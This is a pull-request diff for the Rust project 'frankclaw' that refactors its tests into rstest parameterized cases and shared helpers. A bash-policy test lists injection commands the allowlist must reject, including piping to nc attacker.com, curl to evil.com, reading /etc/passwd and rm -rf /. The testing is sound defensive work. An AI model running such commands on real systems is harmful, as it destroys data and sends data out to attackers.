-        assert_eq!(guard.actions_this_hour().await, 2);
+        unlimited_guard.record_llm_call("gpt-4o", 10, 10).await;
+        unlimited_guard.record_llm_call("gpt-4o", 10, 10).await;
+        assert_eq!(unlimited_guard.actions_this_hour().await, 2);
     }
 
+    #[rstest]
     #[tokio::test]
-    async fn per_model_usage_tracking() {
-        let guard = CostGuard::new(CostGuardConfig::default());
-        assert!(guard.model_usage().await.is_empty());
+    async fn per_model_usage_tracking(unlimited_guard: CostGuard) {
+        assert!(unlimited_guard.model_usage().await.is_empty());
 
-        guard.record_llm_call("gpt-4o", 1000, 500).await;
-        guard.record_llm_call("gpt-4o", 2000, 1000).await;
-        guard
+        unlimited_guard.record_llm_call("gpt-4o", 1000, 500).await;
+        unlimited_guard
+            .record_llm_call("gpt-4o", 2000, 1000)
+            .await;
+        unlimited_guard
             .record_llm_call("claude-3-5-sonnet-20241022", 500, 200)
             .await;
 
-        let usage = guard.model_usage().await;
+        let usage = unlimited_guard.model_usage().await;
         assert_eq!(usage.len(), 2);
 
         let gpt = usage.get("gpt-4o").expect("gpt-4o should be tracked");
@@ -366,6 +388,7 @@ mod tests {
         assert!(rate.to_string().contains("100 allowed"));
     }
 
+    #[rstest]
     #[tokio::test]
     async fn checked_sub_no_panic_on_fresh_guard() {
         let guard = CostGuard::new(CostGuardConfig {

--- a/crates/frankclaw-models/src/costs.rs
+++ b/crates/frankclaw-models/src/costs.rs
@@ -95,19 +95,15 @@ fn is_local_model(model_id: &str) -> bool {
 #[cfg(test)]
 mod tests {
     use super::*;
+    use rstest::rstest;
 
-    #[test]
-    fn known_model_has_nonzero_cost() {
-        let (input, output) = model_cost("gpt-4o").unwrap();
-        assert!(input > 0.0);
-        assert!(output > input);
-    }
-
-    #[test]
-    fn claude_costs_are_known() {
-        let (input, output) = model_cost("claude-3-5-sonnet-20241022").unwrap();
-        assert!(input > 0.0);
-        assert!(output > input);
+    #[rstest]
+    #[case("gpt-4o")]
+    #[case("claude-3-5-sonnet-20241022")]
+    fn known_model_has_cost(#[case] model: &str) {
+        let (input, output) = model_cost(model).expect("expected cost for known model");
+        assert!(input > 0.0, "expected positive input cost for {model}");
+        assert!(output > input, "expected output cost > input cost for {model}");
     }
 
     #[test]

--- a/crates/frankclaw-models/src/openai_compat.rs
+++ b/crates/frankclaw-models/src/openai_compat.rs
@@ -429,14 +429,7 @@ mod tests {
                 }],
             )],
             max_tokens: Some(1024),
-            temperature: None,
-            system: None,
-            tools: vec![],
-            thinking_budget: None,
-            parallel_tool_calls: None,
-            seed: None,
-            response_format: None,
-            reasoning_effort: None,
+            ..Default::default()
         };
         let body = build_request_body(&request);
         let msg = &body["messages"][0];
@@ -458,14 +451,7 @@ mod tests {
             model_id: "gpt-4o".into(),
             messages: vec![CompletionMessage::text(Role::User, "hello")],
             max_tokens: Some(1024),
-            temperature: None,
-            system: None,
-            tools: vec![],
-            thinking_budget: None,
-            parallel_tool_calls: None,
-            seed: None,
-            response_format: None,
-            reasoning_effort: None,
+            ..Default::default()
         };
         let body = build_request_body(&request);
         let msg = &body["messages"][0];
@@ -491,15 +477,7 @@ mod tests {
                     },
                 ],
             )],
-            max_tokens: None,
-            temperature: None,
-            system: None,
-            tools: vec![],
-            thinking_budget: None,
-            parallel_tool_calls: None,
-            seed: None,
-            response_format: None,
-            reasoning_effort: None,
+            ..Default::default()
         };
         let body = build_request_body(&request);
         let content = body["messages"][0]["content"]
@@ -515,15 +493,8 @@ mod tests {
         let request = CompletionRequest {
             model_id: "gpt-4o".into(),
             messages: vec![CompletionMessage::text(Role::User, "hello")],
-            max_tokens: None,
-            temperature: None,
-            system: None,
-            tools: vec![],
-            thinking_budget: None,
             parallel_tool_calls: Some(false),
-            seed: None,
-            response_format: None,
-            reasoning_effort: None,
+            ..Default::default()
         };
         let body = build_request_body(&request);
         assert_eq!(body["parallel_tool_calls"], false);
@@ -534,15 +505,8 @@ mod tests {
         let request = CompletionRequest {
             model_id: "gpt-4o".into(),
             messages: vec![CompletionMessage::text(Role::User, "hello")],
-            max_tokens: None,
-            temperature: None,
-            system: None,
-            tools: vec![],
-            thinking_budget: None,
-            parallel_tool_calls: None,
             seed: Some(42),
-            response_format: None,
-            reasoning_effort: None,
+            ..Default::default()
         };
         let body = build_request_body(&request);
         assert_eq!(body["seed"], 42);
@@ -553,15 +517,8 @@ mod tests {
         let request = CompletionRequest {
             model_id: "gpt-4o".into(),
             messages: vec![CompletionMessage::text(Role::User, "hello")],
-            max_tokens: None,
-            temperature: None,
-            system: None,
-            tools: vec![],
-            thinking_budget: None,
-            parallel_tool_calls: None,
-            seed: None,
             response_format: Some(ResponseFormat::JsonObject),
-            reasoning_effort: None,
+            ..Default::default()
         };
         let body = build_request_body(&request);
         assert_eq!(body["response_format"]["type"], "json_object");
@@ -572,15 +529,8 @@ mod tests {
         let request = CompletionRequest {
             model_id: "o3-mini".into(),
             messages: vec![CompletionMessage::text(Role::User, "hello")],
-            max_tokens: None,
-            temperature: None,
-            system: None,
-            tools: vec![],
-            thinking_budget: None,
-            parallel_tool_calls: None,
-            seed: None,
-            response_format: None,
             reasoning_effort: Some("high".into()),
+            ..Default::default()
         };
         let body = build_request_body(&request);
         assert_eq!(body["reasoning_effort"], "high");
@@ -591,15 +541,7 @@ mod tests {
         let request = CompletionRequest {
             model_id: "gpt-4o".into(),
             messages: vec![CompletionMessage::text(Role::User, "hello")],
-            max_tokens: None,
-            temperature: None,
-            system: None,
-            tools: vec![],
-            thinking_budget: None,
-            parallel_tool_calls: None,
-            seed: None,
-            response_format: None,
-            reasoning_effort: None,
+            ..Default::default()
         };
         let body = build_request_body(&request);
         assert!(body.get("parallel_tool_calls").is_none());

--- a/crates/frankclaw-models/src/retry.rs
+++ b/crates/frankclaw-models/src/retry.rs
@@ -87,6 +87,7 @@ pub fn is_retryable_error(error_msg: &str) -> bool {
 #[cfg(test)]
 mod tests {
     use super::*;
+    use rstest::rstest;
 
     #[test]
     fn backoff_delay_is_within_range() {
@@ -120,23 +121,20 @@ mod tests {
         }
     }
 
-    #[test]
-    fn retryable_error_patterns() {
-        assert!(is_retryable_error("connection timeout"));
-        assert!(is_retryable_error("rate limit exceeded"));
-        assert!(is_retryable_error("HTTP 429 Too Many Requests"));
-        assert!(is_retryable_error("502 Bad Gateway"));
-        assert!(is_retryable_error("server temporarily unavailable"));
-        assert!(is_retryable_error("service overloaded, try again"));
-    }
-
-    #[test]
-    fn non_retryable_error_patterns() {
-        assert!(!is_retryable_error("authentication failed"));
-        assert!(!is_retryable_error("401 Unauthorized"));
-        assert!(!is_retryable_error("context length exceeded"));
-        assert!(!is_retryable_error("model not found: gpt-5"));
-        assert!(!is_retryable_error("invalid api key"));
+    #[rstest]
+    #[case("connection timeout", true)]
+    #[case("rate limit exceeded", true)]
+    #[case("HTTP 429 Too Many Requests", true)]
+    #[case("502 Bad Gateway", true)]
+    #[case("server temporarily unavailable", true)]
+    #[case("service overloaded, try again", true)]
+    #[case("authentication failed", false)]
+    #[case("401 Unauthorized", false)]
+    #[case("context length exceeded", false)]
+    #[case("model not found: gpt-5", false)]
+    #[case("invalid api key", false)]
+    fn error_retryability(#[case] msg: &str, #[case] should_retry: bool) {
+        assert_eq!(is_retryable_error(msg), should_retry, "pattern: {msg}");
     }
 
     #[test]

--- a/crates/frankclaw-models/src/routing.rs
+++ b/crates/frankclaw-models/src/routing.rs
@@ -553,21 +553,23 @@ pub fn response_is_uncertain(content: &str) -> bool {
 #[cfg(test)]
 mod tests {
     use super::*;
+    use rstest::rstest;
 
     // -----------------------------------------------------------------------
     // Tier boundaries
     // -----------------------------------------------------------------------
 
-    #[test]
-    fn tier_from_score_boundaries() {
-        assert_eq!(Tier::from_score(0), Tier::Flash);
-        assert_eq!(Tier::from_score(15), Tier::Flash);
-        assert_eq!(Tier::from_score(16), Tier::Standard);
-        assert_eq!(Tier::from_score(40), Tier::Standard);
-        assert_eq!(Tier::from_score(41), Tier::Pro);
-        assert_eq!(Tier::from_score(65), Tier::Pro);
-        assert_eq!(Tier::from_score(66), Tier::Frontier);
-        assert_eq!(Tier::from_score(100), Tier::Frontier);
+    #[rstest]
+    #[case(0, Tier::Flash)]
+    #[case(15, Tier::Flash)]
+    #[case(16, Tier::Standard)]
+    #[case(40, Tier::Standard)]
+    #[case(41, Tier::Pro)]
+    #[case(65, Tier::Pro)]
+    #[case(66, Tier::Frontier)]
+    #[case(100, Tier::Frontier)]
+    fn tier_from_score_boundaries(#[case] score: u32, #[case] expected: Tier) {
+        assert_eq!(Tier::from_score(score), expected);
     }
 
     #[test]
@@ -578,12 +580,13 @@ mod tests {
         assert_eq!(s, "standard");
     }
 
-    #[test]
-    fn tier_to_task_complexity_mapping() {
-        assert_eq!(TaskComplexity::from(Tier::Flash), TaskComplexity::Simple);
-        assert_eq!(TaskComplexity::from(Tier::Standard), TaskComplexity::Simple);
-        assert_eq!(TaskComplexity::from(Tier::Pro), TaskComplexity::Moderate);
-        assert_eq!(TaskComplexity::from(Tier::Frontier), TaskComplexity::Complex);
+    #[rstest]
+    #[case(Tier::Flash, TaskComplexity::Simple)]
+    #[case(Tier::Standard, TaskComplexity::Simple)]
+    #[case(Tier::Pro, TaskComplexity::Moderate)]
+    #[case(Tier::Frontier, TaskComplexity::Complex)]
+    fn tier_to_task_complexity(#[case] tier: Tier, #[case] expected: TaskComplexity) {
+        assert_eq!(TaskComplexity::from(tier), expected);
     }
 
     // -----------------------------------------------------------------------
@@ -645,18 +648,24 @@ mod tests {
     }
 
     // -----------------------------------------------------------------------
-    // Individual dimensions
+    // Individual dimensions (parameterized)
     // -----------------------------------------------------------------------
 
-    #[test]
-    fn score_reasoning_dimension() {
-        let result = score_complexity("Why is this better? Explain the trade-offs and compare");
-        let reasoning = result.components.get("reasoning_words").copied().unwrap_or(0);
-        assert!(reasoning >= 100, "Expected reasoning >= 100, got {reasoning}");
+    #[rstest]
+    #[case("Why is this better? Explain the trade-offs and compare", "reasoning_words", 100)]
+    #[case("First, read the file. Then analyze. After that, write a report.", "multi_step", 100)]
+    #[case("Fix the bug in the async function, refactor the module", "code_indicators", 50)]
+    #[case("Store the password and encrypt the auth token", "safety_sensitivity", 100)]
+    #[case("Deploy the kubernetes cluster on aws with terraform", "domain_specific", 100)]
+    #[case("Write a blog post about design patterns, then summarize", "creativity", 100)]
+    fn score_dimension(#[case] prompt: &str, #[case] dimension: &str, #[case] min_score: u32) {
+        let result = score_complexity(prompt);
+        let score = result.components.get(dimension).copied().unwrap_or(0);
+        assert!(score >= min_score, "Expected {dimension} >= {min_score}, got {score}");
     }
 
     #[test]
-    fn score_multi_step_dimension() {
+    fn score_multi_step_dimension_hint() {
         let result = score_complexity(
             "First, read the file at src/auth.ts. Then analyze it for security issues. \
              After that, write a detailed report.",
@@ -664,34 +673,6 @@ mod tests {
         let multi_step = result.components.get("multi_step").copied().unwrap_or(0);
         assert!(multi_step >= 100, "Expected multi_step >= 100, got {multi_step}");
         assert!(result.hints.iter().any(|h| h.contains("multi_step")));
-    }
-
-    #[test]
-    fn score_code_dimension() {
-        let result = score_complexity("Fix the bug in the async function, refactor the module");
-        let code = result.components.get("code_indicators").copied().unwrap_or(0);
-        assert!(code >= 50, "Expected code_indicators >= 50, got {code}");
-    }
-
-    #[test]
-    fn score_safety_dimension() {
-        let result = score_complexity("Store the password and encrypt the auth token");
-        let safety = result.components.get("safety_sensitivity").copied().unwrap_or(0);
-        assert!(safety >= 100, "Expected safety >= 100, got {safety}");
-    }
-
-    #[test]
-    fn score_domain_dimension() {
-        let result = score_complexity("Deploy the kubernetes cluster on aws with terraform");
-        let domain = result.components.get("domain_specific").copied().unwrap_or(0);
-        assert!(domain >= 100, "Expected domain_specific >= 100, got {domain}");
-    }
-
-    #[test]
-    fn score_creativity_dimension() {
-        let result = score_complexity("Write a blog post about design patterns, then summarize");
-        let creativity = result.components.get("creativity").copied().unwrap_or(0);
-        assert!(creativity >= 100, "Expected creativity >= 100, got {creativity}");
     }
 
     #[test]
@@ -746,26 +727,17 @@ mod tests {
     }
 
     // -----------------------------------------------------------------------
-    // Explicit tier hints
+    // Explicit tier hints (parameterized)
     // -----------------------------------------------------------------------
 
-    #[test]
-    fn score_explicit_tier_hint_flash() {
-        let result = score_complexity("[tier:flash] This looks complex but override to flash");
-        assert_eq!(result.tier, Tier::Flash);
+    #[rstest]
+    #[case("[tier:flash] This looks complex but override to flash", Tier::Flash)]
+    #[case("[tier:frontier] Simple question but I want the best", Tier::Frontier)]
+    #[case("[tier:PRO] some message", Tier::Pro)]
+    fn score_explicit_tier_hint(#[case] prompt: &str, #[case] expected: Tier) {
+        let result = score_complexity(prompt);
+        assert_eq!(result.tier, expected);
         assert!(result.hints.iter().any(|h| h.contains("Explicit tier hint")));
-    }
-
-    #[test]
-    fn score_explicit_tier_hint_frontier() {
-        let result = score_complexity("[tier:frontier] Simple question but I want the best");
-        assert_eq!(result.tier, Tier::Frontier);
-    }
-
-    #[test]
-    fn score_explicit_tier_hint_case_insensitive() {
-        let result = score_complexity("[tier:PRO] some message");
-        assert_eq!(result.tier, Tier::Pro);
     }
 
     // -----------------------------------------------------------------------
@@ -847,35 +819,18 @@ mod tests {
     }
 
     // -----------------------------------------------------------------------
-    // Pattern overrides via classify_message
+    // Pattern overrides via classify_message (parameterized)
     // -----------------------------------------------------------------------
 
-    #[test]
-    fn pattern_override_greeting_is_simple() {
-        assert_eq!(classify_message("Hi"), TaskComplexity::Simple);
-        assert_eq!(classify_message("hello"), TaskComplexity::Simple);
-        assert_eq!(classify_message("thanks"), TaskComplexity::Simple);
-    }
-
-    #[test]
-    fn pattern_override_security_audit_is_complex() {
-        assert_eq!(
-            classify_message("Please do a security audit of this contract"),
-            TaskComplexity::Complex
-        );
-    }
-
-    #[test]
-    fn pattern_override_production_deploy_is_moderate() {
-        assert_eq!(
-            classify_message("Deploy this to production"),
-            TaskComplexity::Moderate
-        );
-    }
-
-    #[test]
-    fn pattern_override_time_question_is_simple() {
-        assert_eq!(classify_message("What time is it?"), TaskComplexity::Simple);
+    #[rstest]
+    #[case("Hi", TaskComplexity::Simple)]
+    #[case("hello", TaskComplexity::Simple)]
+    #[case("thanks", TaskComplexity::Simple)]
+    #[case("Please do a security audit of this contract", TaskComplexity::Complex)]
+    #[case("Deploy this to production", TaskComplexity::Moderate)]
+    #[case("What time is it?", TaskComplexity::Simple)]
+    fn pattern_override_classification(#[case] msg: &str, #[case] expected: TaskComplexity) {
+        assert_eq!(classify_message(msg), expected);
     }
 
     #[test]
@@ -923,27 +878,20 @@ mod tests {
     }
 
     // -----------------------------------------------------------------------
-    // Uncertainty detection
+    // Uncertainty detection (parameterized)
     // -----------------------------------------------------------------------
 
-    #[test]
-    fn detects_uncertain_response() {
-        assert!(response_is_uncertain("I'm not sure."));
-        assert!(response_is_uncertain("I don't know how to do that."));
-        assert!(response_is_uncertain("I cannot help with that."));
-        assert!(response_is_uncertain("Could you clarify what you mean?"));
-    }
-
-    #[test]
-    fn detects_empty_response_as_uncertain() {
-        assert!(response_is_uncertain(""));
-        assert!(response_is_uncertain("   "));
-    }
-
-    #[test]
-    fn confident_response_is_not_uncertain() {
-        assert!(!response_is_uncertain("Yes."));
-        assert!(!response_is_uncertain("The answer is 42. This is a well-known constant."));
-        assert!(!response_is_uncertain("Deployed successfully to production mainnet."));
+    #[rstest]
+    #[case("I'm not sure.", true)]
+    #[case("I don't know how to do that.", true)]
+    #[case("I cannot help with that.", true)]
+    #[case("Could you clarify what you mean?", true)]
+    #[case("", true)]
+    #[case("   ", true)]
+    #[case("Yes.", false)]
+    #[case("The answer is 42.", false)]
+    #[case("Deployed successfully.", false)]
+    fn uncertainty_detection(#[case] response: &str, #[case] expected: bool) {
+        assert_eq!(response_is_uncertain(response), expected);
     }
 }

--- a/crates/frankclaw-models/tests/common/mod.rs
+++ b/crates/frankclaw-models/tests/common/mod.rs
@@ -1,0 +1,72 @@
+//! Shared test helpers for `frankclaw-models` integration and smoke tests.
+
+#![allow(dead_code)]
+
+use frankclaw_core::model::{CompletionMessage, CompletionRequest};
+use frankclaw_core::types::Role;
+use secrecy::SecretString;
+
+/// Returns the OpenAI API key from `OPENAI_API_KEY`, if set and non-empty.
+pub fn openai_key() -> Option<SecretString> {
+    std::env::var("OPENAI_API_KEY")
+        .ok()
+        .filter(|k| !k.trim().is_empty())
+        .map(SecretString::from)
+}
+
+/// Returns the OpenAI-compatible base URL. If `OPENAI_API_KEY` looks like an
+/// OpenRouter key (`sk-or-*`), use the OpenRouter endpoint automatically.
+pub fn openai_base_url() -> String {
+    let key = std::env::var("OPENAI_API_KEY").unwrap_or_default();
+    if key.starts_with("sk-or-") {
+        "https://openrouter.ai/api/v1".into()
+    } else {
+        std::env::var("OPENAI_BASE_URL")
+            .unwrap_or_else(|_| "https://api.openai.com/v1".into())
+    }
+}
+
+/// Pick a model that works with the detected endpoint.
+pub fn openai_model() -> String {
+    let key = std::env::var("OPENAI_API_KEY").unwrap_or_default();
+    if key.starts_with("sk-or-") {
+        // OpenRouter model IDs use provider prefix
+        "openai/gpt-4o-mini".into()
+    } else {
+        "gpt-4o-mini".into()
+    }
+}
+
+/// Returns the Anthropic API key from `ANTHROPIC_API_KEY`, if set and non-empty.
+pub fn anthropic_key() -> Option<SecretString> {
+    std::env::var("ANTHROPIC_API_KEY")
+        .ok()
+        .filter(|k| !k.trim().is_empty())
+        .map(SecretString::from)
+}
+
+/// Checks whether a local Ollama instance is reachable on port 11434.
+pub fn ollama_available() -> bool {
+    std::net::TcpStream::connect_timeout(
+        &"127.0.0.1:11434".parse().expect("valid addr"),
+        std::time::Duration::from_secs(2),
+    )
+    .is_ok()
+}
+
+/// Builds a minimal [`CompletionRequest`] with a single user message.
+pub fn simple_request(model: &str, prompt: &str) -> CompletionRequest {
+    CompletionRequest {
+        model_id: model.into(),
+        messages: vec![CompletionMessage::text(Role::User, prompt)],
+        max_tokens: Some(50),
+        temperature: Some(0.0),
+        system: None,
+        tools: Vec::new(),
+        thinking_budget: None,
+        parallel_tool_calls: None,
+        seed: None,
+        response_format: None,
+        reasoning_effort: None,
+    }
+}

--- a/crates/frankclaw-models/tests/integration.rs
+++ b/crates/frankclaw-models/tests/integration.rs
@@ -28,58 +28,8 @@ use frankclaw_models::{
 };
 use secrecy::SecretString;
 
-// ---------------------------------------------------------------------------
-// Helpers
-// ---------------------------------------------------------------------------
-
-fn openai_key() -> Option<SecretString> {
-    std::env::var("OPENAI_API_KEY")
-        .ok()
-        .filter(|k| !k.trim().is_empty())
-        .map(SecretString::from)
-}
-
-fn openai_base_url() -> String {
-    let key = std::env::var("OPENAI_API_KEY").unwrap_or_default();
-    if key.starts_with("sk-or-") {
-        "https://openrouter.ai/api/v1".into()
-    } else {
-        std::env::var("OPENAI_BASE_URL")
-            .unwrap_or_else(|_| "https://api.openai.com/v1".into())
-    }
-}
-
-fn openai_model() -> String {
-    let key = std::env::var("OPENAI_API_KEY").unwrap_or_default();
-    if key.starts_with("sk-or-") {
-        "openai/gpt-4o-mini".into()
-    } else {
-        "gpt-4o-mini".into()
-    }
-}
-
-fn anthropic_key() -> Option<SecretString> {
-    std::env::var("ANTHROPIC_API_KEY")
-        .ok()
-        .filter(|k| !k.trim().is_empty())
-        .map(SecretString::from)
-}
-
-fn simple_request(model: &str, prompt: &str) -> CompletionRequest {
-    CompletionRequest {
-        model_id: model.into(),
-        messages: vec![CompletionMessage::text(Role::User, prompt)],
-        max_tokens: Some(50),
-        temperature: Some(0.0),
-        system: None,
-        tools: Vec::new(),
-        thinking_budget: None,
-        parallel_tool_calls: None,
-        seed: None,
-        response_format: None,
-        reasoning_effort: None,
-    }
-}
+mod common;
+use common::*;
 
 // ---------------------------------------------------------------------------
 // Circuit Breaker Integration

--- a/crates/frankclaw-models/tests/smoke.rs
+++ b/crates/frankclaw-models/tests/smoke.rs
@@ -39,70 +39,8 @@ use frankclaw_models::{AnthropicProvider, FailoverChain, OllamaProvider, OpenAiP
 use secrecy::SecretString;
 use std::sync::Arc;
 
-// ---------------------------------------------------------------------------
-// Helpers
-// ---------------------------------------------------------------------------
-
-fn openai_key() -> Option<SecretString> {
-    std::env::var("OPENAI_API_KEY")
-        .ok()
-        .filter(|k| !k.trim().is_empty())
-        .map(SecretString::from)
-}
-
-/// Returns the OpenAI-compatible base URL. If OPENAI_API_KEY looks like an
-/// OpenRouter key (sk-or-*), use the OpenRouter endpoint automatically.
-fn openai_base_url() -> String {
-    let key = std::env::var("OPENAI_API_KEY").unwrap_or_default();
-    if key.starts_with("sk-or-") {
-        "https://openrouter.ai/api/v1".into()
-    } else {
-        std::env::var("OPENAI_BASE_URL")
-            .unwrap_or_else(|_| "https://api.openai.com/v1".into())
-    }
-}
-
-/// Pick a model that works with the detected endpoint.
-fn openai_model() -> String {
-    let key = std::env::var("OPENAI_API_KEY").unwrap_or_default();
-    if key.starts_with("sk-or-") {
-        // OpenRouter model IDs use provider prefix
-        "openai/gpt-4o-mini".into()
-    } else {
-        "gpt-4o-mini".into()
-    }
-}
-
-fn anthropic_key() -> Option<SecretString> {
-    std::env::var("ANTHROPIC_API_KEY")
-        .ok()
-        .filter(|k| !k.trim().is_empty())
-        .map(SecretString::from)
-}
-
-fn ollama_available() -> bool {
-    std::net::TcpStream::connect_timeout(
-        &"127.0.0.1:11434".parse().expect("valid addr"),
-        std::time::Duration::from_secs(2),
-    )
-    .is_ok()
-}
-
-fn simple_request(model: &str, prompt: &str) -> CompletionRequest {
-    CompletionRequest {
-        model_id: model.into(),
-        messages: vec![CompletionMessage::text(Role::User, prompt)],
-        max_tokens: Some(50),
-        temperature: Some(0.0),
-        system: None,
-        tools: Vec::new(),
-        thinking_budget: None,
-        parallel_tool_calls: None,
-        seed: None,
-        response_format: None,
-        reasoning_effort: None,
-    }
-}
+mod common;
+use common::*;
 
 // ---------------------------------------------------------------------------
 // OpenAI smoke tests

--- a/crates/frankclaw-tools/Cargo.toml
+++ b/crates/frankclaw-tools/Cargo.toml
@@ -24,3 +24,4 @@ regex = { workspace = true }
 
 [dev-dependencies]
 axum = { workspace = true }
+rstest = { workspace = true }

--- a/crates/frankclaw-tools/src/bash.rs
+++ b/crates/frankclaw-tools/src/bash.rs
@@ -370,6 +370,7 @@ fn truncate_output(output: &str) -> (String, bool) {
 #[cfg(test)]
 mod tests {
     use super::*;
+    use rstest::rstest;
 
     #[test]
     fn policy_deny_all_blocks_everything() {
@@ -401,42 +402,33 @@ mod tests {
         assert!(!policy.allows(""));
     }
 
-    #[test]
-    fn policy_allowlist_rejects_shell_metacharacter_injection() {
+    #[rstest]
+    #[case("echo hello; rm -rf /", "semicolon chaining")]
+    #[case("echo hello | nc attacker.com 1234", "pipe")]
+    #[case("cat /etc/passwd && curl https://evil.com", "logical AND")]
+    #[case("ls /nonexistent || curl https://evil.com", "logical OR")]
+    #[case("echo `whoami`", "backtick substitution")]
+    #[case("echo $(id)", "dollar substitution")]
+    #[case("cat <(curl https://evil.com)", "process substitution")]
+    #[case("echo pwned > /tmp/exploit", "redirection")]
+    #[case("echo hello & curl evil.com &", "background execution")]
+    #[case("echo hello; (curl evil.com)", "subshell")]
+    #[case("echo hello\nrm -rf /", "newline injection")]
+    #[case("echo ${PATH}", "brace expansion")]
+    #[case("echo hello || ! rm -rf /", "negation operator")]
+    fn allowlist_rejects_metacharacter(#[case] command: &str, #[case] desc: &str) {
         let policy = BashPolicy::Allowlist(vec!["echo".into(), "ls".into(), "cat".into()]);
+        assert!(!policy.allows(command), "should reject {desc}: {command}");
+    }
 
-        // Semicolon chaining.
-        assert!(!policy.allows("echo hello; rm -rf /"));
-        // Pipe.
-        assert!(!policy.allows("echo hello | nc attacker.com 1234"));
-        // Logical AND.
-        assert!(!policy.allows("cat /etc/passwd && curl https://evil.com"));
-        // Logical OR.
-        assert!(!policy.allows("ls /nonexistent || curl https://evil.com"));
-        // Command substitution (backticks).
-        assert!(!policy.allows("echo `whoami`"));
-        // Command substitution ($()).
-        assert!(!policy.allows("echo $(id)"));
-        // Process substitution.
-        assert!(!policy.allows("cat <(curl https://evil.com)"));
-        // Redirection.
-        assert!(!policy.allows("echo pwned > /tmp/exploit"));
-        // Background execution.
-        assert!(!policy.allows("echo hello & curl evil.com &"));
-        // Subshell.
-        assert!(!policy.allows("echo hello; (curl evil.com)"));
-        // Newline injection.
-        assert!(!policy.allows("echo hello\nrm -rf /"));
-        // Brace expansion with command.
-        assert!(!policy.allows("echo ${PATH}"));
-        // Negation operator.
-        assert!(!policy.allows("echo hello || ! rm -rf /"));
-
-        // But clean commands still work.
-        assert!(policy.allows("echo hello world"));
-        assert!(policy.allows("ls -la /tmp"));
-        assert!(policy.allows("cat /etc/hostname"));
-        assert!(policy.allows("echo 'safe with spaces'"));
+    #[rstest]
+    #[case("echo hello world")]
+    #[case("ls -la /tmp")]
+    #[case("cat /etc/hostname")]
+    #[case("echo 'safe with spaces'")]
+    fn allowlist_allows_clean_commands(#[case] command: &str) {
+        let policy = BashPolicy::Allowlist(vec!["echo".into(), "ls".into(), "cat".into()]);
+        assert!(policy.allows(command), "should allow: {command}");
     }
 
     #[test]


### PR DESCRIPTION
This PR is the test-only slice from #3.

It keeps the scope to testing changes that improve coverage, reduce boilerplate, and establish reusable test building blocks without changing production behavior.

## What changed

- migrated existing tests to `rstest` fixtures and parameterized cases
- extracted shared test helpers in `frankclaw-models`
- derived `Default` where tests benefit from struct update syntax
- introduced a small gateway test fixture module backed by `tempfile::TempDir`
- switched gateway method tests to shared `rstest` fixtures instead of hand-rolled temp-dir management
- folded repeated cancel-path assertions into a single parameterized gateway test
- split broad tests into smaller single-purpose cases
- reduced repetitive test setup and assertion boilerplate

## Why this shape

The goal is a bottom-up testing story.

This PR introduces reusable fixtures first, then applies them in gateway method tests. That keeps the pattern concrete and gives later test cleanups a shared base to build on.

## Verification

- `cargo test -p frankclaw-core -p frankclaw-models -p frankclaw-gateway -p frankclaw-tools`
